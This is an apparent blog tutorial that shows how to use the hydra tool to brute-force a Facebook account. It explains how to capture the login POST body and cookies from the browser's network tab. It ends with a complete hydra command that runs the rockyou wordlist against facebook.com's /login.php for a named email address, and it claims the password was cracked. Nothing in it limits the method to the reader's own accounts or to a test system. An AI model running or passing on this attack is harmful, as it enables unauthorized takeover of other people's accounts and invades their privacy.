In this post I am going to show you how to use hydra to hack facebook account. If you don’t know already, hydra is one of the best available tools for cracking online passwords. It uses brute force methodolgy to crack passwords and get access to other users account.

Before we go actually go and use hydra to crack facebook account, we need to first learn how to use it. Hydra has a very complex syntax for attacking web applications. So, lets just go and see the syntax first.

SYNTAX:

hydra -V -f -l <login id> -P <password list> target service “login_uri:parameters:S=success string:H=optional headers”

At the very first the syntax looks very complex. But don’t worry I will make it easier for you to understand. Let’s just go and explore the complex looking syntax step by step.

hydra – This is the program which we are using to launch the attack.

Hydra comes pre-installed in all versions of kali. So, you don’t need to do anything fancy. Just lauch it from the command line by typing hydra.

Next we need pass the command line options to hydra to tell hydra what to do. These options are described as below:

-V :      verbosely output all the username and password combinations tried

 -f :      tells hydra to stop when a successfull username and password combination is found

-l :         specify the facebook id to attack against

 -P :           specifies the wordlist which we want to use for password cracking

target :       target is the domain name or IP adress of the web server (www.facebook.com in this case)

service :         Service which we want to attack. For web applications it is usually https-form-post

At the end, we need to pass a string containing atleast three parameters separated by colon. The first parameter is login uri which in case of facebook is /login.php.

Next, we need to pass parameters which the site uses in the post request. We can find it by visiting the website https://www.facebook.com/login.php and then right clicking anywhere and inspecting element. Then go to the network tab and fill in wrong crednetials in the facebook login form. Click login to submit the request. After submitting the request it will look something like this

Now, make sure you select the post request to /login.php in the network tab as highlighted in the above screenshot (blue strip). Click on edit and resend raw headers in the right. Go to the bottom and copy the request body as shown.

That’s it, we have got the parameters. Now, we only need the cookies. You can copy the cookie from the same place we are. Look at the screenshot below.

Now, we have everything we want to start attacking the facebook. So, lets do it

Cracking Facebook Account

Before we start our attack, let us summarize what we need and what we have

login id pipaxajub@xgmailoo.com

password list – we are going to use famous rockyou.txt (/usr/share/wordlists/rockyou.txt)

login uri – /login.php

Success string – 302 Found (facebook redirects us upon successfull login attempt)

Cookie – Cookie: fr=1RmAGyVQjUQvmMHbx..Bbt5QG._g.AAA.0.0.Bbt5YX.AWXVRVxn; sb=BpS3W_v5Kj88_BHTPlhJc8jz; _js_datr=BpS3W9RZC3WOVGdRDnANmr7t; wd=1366x158; datr=BpS3W9RZC3WOVGdRDnANmr7t; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php; _js_reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php%3Flogin_attempt%3D1%26lwv%3D100; act=1538758289006%2F0

parameters – before using the parameters we copied we need to make little changes to it. Let’s say the post paramenters we copied are:

lsd=AVrchJ_j&display=&enable_profile_selector=&isprivate=&legacy_return=0&profile_selector_ids=&return_session=&skip_api_login=&signed_next=&trynum=2&timezone=-330&lgndim=eyJ3IjoxMzY2LCJoIjo3NjgsImF3IjoxMzY2LCJhaCI6NzQxLCJjIjoyNH0%3D&lgnrnd=094935_05ZU&lgnjs=1538758178&email=pipaxajub@xgmailoo.com&pass=mypassword&prefill_contact_point=&prefill_source=&prefill_type=&first_prefill_source=&first_prefill_type=&had_cp_prefilled=false&had_password_prefilled=false&ab_test_data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

We need to change the highlighted email and password field to ^USER^ and ^PASS^ respectively. After making the changes it will look like

lsd=AVrchJ_j&display=&enable_profile_selector=&isprivate=&legacy_return=0&profile_selector_ids=&return_session=&skip_api_login=&signed_next=&trynum=2&timezone=-330&lgndim=eyJ3IjoxMzY2LCJoIjo3NjgsImF3IjoxMzY2LCJhaCI6NzQxLCJjIjoyNH0%3D&lgnrnd=094935_05ZU&lgnjs=1538758178&email=^USER^&pass=^PASS^&prefill_contact_point=&prefill_source=&prefill_type=&first_prefill_source=&first_prefill_type=&had_cp_prefilled=false&had_password_prefilled=false&ab_test_data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

FInally let’s just go and hack it.

hydra -V -f -l pipaxajub@xgmailoo.com -P /usr/share/wordlists/rockyou.txt www.facebook.com https-form-post/login.php:lsd=AVpU3ryk&display=&enable_profile_selector=&isprivate=&legacy_return=0&profile_selector_ids=&return_session=&skip_api_login=&signed_next=&trynum=1&timezone=-330&lgndim=eyJ3IjoxMzY2LCJoIjo3NjgsImF3IjoxMzY2LCJhaCI6NzQxLCJjIjoyNH0%3D&lgnrnd=072001_D_R0&lgnjs=1538662825&email=pipaxajub%40xgmailoo.com&pass=^PASS^&prefill_contact_point=pipaxajub%40xgmailoo.com&prefill_source=browser_dropdown&prefill_type=contact_point&first_prefill_source=browser_dropdown&first_prefill_type=contact_point&had_cp_prefilled=true&had_password_prefilled=false&ab_test_data=AAAAAAAAA%2FfAAAAAAAAAAAAAAAAAAAAAAAAAAfAAAA%2FVAAAAAACAAB:S=302 Found:H=Cookie: fr=3hbeXmLbS3rchFjoy.AWXWzgFPNDY4prUO3J8qp0M4mnU.BbtiAW.ql.AAA.0.0.BbtiGR.AWUazXzw; sb=FiC2WwrFWqKXnIDWiH5ndj_I; wd=1366x610; datr=FiC2W-MY-F0pz5EhTffwl8K7; locale=en_GB; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2F%3Fstype%3Dlo%26jlou%3DAfe9PsKtmkfV4tRhy9-mZcXQURworCchbRiP-AvYiHjBYvV8iS3mHZI9k8irdFK6EmyVTDfazWWbV3hocXYIjNOhLdHN3aM8Ze9OsEupCLToSA%26smuh%3D53158%26lh%3DAc8lQWN1lWI2vAgj; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; _js_reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin; act=1538662846633%2F3

After a few minutes of run, hydra finally brings me the correct login and password details.

So, we finaly managed to hack the facebook account with hydra.



Note: Use Virtual Machine and scan on VirusTotal before downloading any program on Host Machine for your privacy.